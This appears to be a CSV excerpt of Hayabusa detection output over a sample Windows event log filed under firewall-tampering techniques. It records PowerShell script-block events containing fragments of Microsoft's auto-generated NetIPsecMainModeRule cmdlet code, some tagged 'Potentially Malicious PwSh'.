[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletizatio",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null 
$__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' -Alias '*' function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) 
$__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletizatio",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"n_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) 
$__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' -Alias '*' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and 
(@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParam",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"n_values = @(${Phase1AuthSet}) 
$__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { 